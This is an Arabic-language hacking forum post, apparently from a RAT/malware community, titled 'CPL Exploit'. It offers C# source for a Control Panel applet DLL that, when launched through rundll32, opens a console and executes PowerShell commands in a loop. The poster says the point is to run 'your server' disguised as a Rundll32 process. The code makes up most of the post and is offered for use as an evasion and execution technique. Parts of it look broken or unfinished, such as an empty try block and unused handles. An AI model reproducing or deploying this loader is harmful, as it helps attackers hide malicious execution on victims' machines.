25.04.2017 CPL Exploit [Run your Server As Rundl32 process]


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,821
3,865
1
رح يشتغل سيرفرك كـعملية Rundll32 بس رح تظهر الكونسول


الاكواد

C#:
using System;
using System.Runtime.InteropServices;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
public class Test
{
    [DllExport("CPlApplet", CallingConvention = CallingConvention.StdCall)]
    public static bool CPlApplet()
    {
        while (true)
        {
            AllocConsole();
            IntPtr defaultStdout = new IntPtr(7);
            IntPtr currentStdout = GetStdHandle(StdOutputHandle);
            string x = Console.ReadLine();
            Console.WriteLine(RunPSCommand(x));
            try
            {
    
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
        }
        return true;
    }
    public static string RunPSCommand(string cmd)
    {
        Runspace runspace = RunspaceFactory.CreateRunspace();
        runspace.Open();
        RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
        Pipeline pipeline = runspace.CreatePipeline();
        pipeline.Commands.AddScript(cmd);
        pipeline.Commands.Add("Out-String");
        Collection<PSObject> results = pipeline.Invoke();
        runspace.Close();
        StringBuilder stringBuilder = new StringBuilder();
        foreach (PSObject obj in results)
        {
            stringBuilder.Append(obj);
        }
        return stringBuilder.ToString().Trim();
    }
    public static void RunPSFile(string script)
    {
        PowerShell ps = PowerShell.Create();
        ps.AddScript(script).Invoke();
    }
    private const UInt32 StdOutputHandle = 0xFFFFFFF5;
    [DllImport("kernel32.dll")]
    private static extern IntPtr GetStdHandle(UInt32 nStdHandle);
    [DllImport("kernel32.dll")]
    private static extern void SetStdHandle(UInt32 nStdHandle, IntPtr handle);
    [DllImport("kernel32")]
    static extern bool AllocConsole();
الفديو بالمرفقات .

 

المرفقات

  • 61.3 MB المشاهدات: 39